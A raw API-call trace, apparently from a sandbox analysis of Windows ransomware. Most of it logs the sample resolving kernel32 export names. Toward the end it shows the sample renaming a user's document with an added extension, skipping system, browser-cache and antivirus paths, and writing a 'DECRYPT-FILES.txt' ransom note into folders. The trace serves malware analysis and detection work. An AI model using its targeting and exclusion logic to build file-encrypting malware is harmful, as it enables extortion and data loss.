lpString1="CreateProcessA") returned="CreateProcessA" [0083.199] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.199] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.199] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.199] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.199] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.199] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.199] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.199] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.199] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.200] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.200] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.200] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.200] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.200] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.200] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.200] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.200] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.200] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.200] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.200] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.200] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.200] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.200] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.200] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.200] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.200] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.200] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.200] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.200] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.200] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.200] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.200] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.200] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.200] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.200] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.200] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.200] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.200] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.200] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.200] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.200] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.200] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.200] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.200] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.200] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.200] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.201] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.201] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.201] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.201] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.201] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.201] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.201] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.201] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.201] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.201] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.201] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.201] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.201] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.201] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.201] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.201] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.201] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.201] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.201] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.201] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.201] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.201] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.201] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.201] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.201] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.201] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.201] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.201] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.201] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.201] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.201] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.201] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.201] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.201] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.201] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.201] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.201] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.201] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.202] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.202] lstrlenA (lpString="DELETEATOM") returned 10 [0083.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.202] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.202] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.202] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.202] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.202] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.202] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.202] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.202] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.202] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.202] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.202] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.202] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.202] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.202] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.202] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.202] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.202] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.203] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.203] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.203] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.203] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.203] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.203] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.203] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.203] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.203] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.203] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.203] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.203] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.203] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.203] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.203] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.203] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.203] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.203] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.204] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.204] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.204] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.204] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.204] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.204] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.204] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.204] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.204] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.204] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.204] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.204] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\rES2CsWP4V9F.ppt") returned 80 [0083.204] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\rES2CsWP4V9F.ppt.m3Lgp") returned 86 [0083.204] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\rES2CsWP4V9F.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\res2cswp4v9f.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\rES2CsWP4V9F.ppt.m3Lgp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\res2cswp4v9f.ppt.m3lgp"), dwFlags=0x0) returned 1 [0083.205] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.205] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.205] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.205] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78bc85a0, ftCreationTime.dwHighDateTime=0x1d4cfb8, ftLastAccessTime.dwLowDateTime=0xb053a7a0, ftLastAccessTime.dwHighDateTime=0x1d4d51c, ftLastWriteTime.dwLowDateTime=0xb053a7a0, ftLastWriteTime.dwHighDateTime=0x1d4d51c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="wMOo1ftKNq", cAlternateFileName="WMOO1F~1")) returned 1 [0083.205] lstrcmpW (lpString1="wMOo1ftKNq", lpString2=".") returned 1 [0083.205] lstrcmpW (lpString1="wMOo1ftKNq", lpString2="..") returned 1 [0083.205] lstrcatW (in: lpString1="wMOo1ftKNq", lpString2="\\" | out: lpString1="wMOo1ftKNq\\") returned="wMOo1ftKNq\\" [0083.205] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpString2="wMOo1ftKNq\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\" [0083.205] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpSrch="\\Program Files") returned 0x0 [0083.205] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpSrch=":\\Windows") returned 0x0 [0083.205] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpSrch="\\Games\\") returned 0x0 [0083.205] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpSrch="\\Tor Browser\\") returned 0x0 [0083.206] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpSrch="\\ProgramData\\") returned 0x0 [0083.206] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0083.206] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0083.206] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0083.206] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpSrch="\\All Users") returned 0x0 [0083.206] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpSrch="\\IETldCache\\") returned 0x0 [0083.206] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpSrch="\\Local Settings\\") returned 0x0 [0083.206] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpSrch="\\AppData\\Local") returned 0x0 [0083.206] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpSrch="AhnLab") returned 0x0 [0083.206] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0083.206] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\") returned 75 [0083.206] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0083.206] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\\\jkbimi8.tmp") returned 87 [0083.206] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\wmoo1ftknq\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0083.207] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\") returned 75 [0083.207] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0083.207] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\\\DECRYPT-FILES.txt") returned 93 [0083.207] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\wmoo1ftknq\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0083.208] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0083.208] CloseHandle (hObject=0x44c) returned 1 [0083.209] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\") returned 75 [0083.209] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 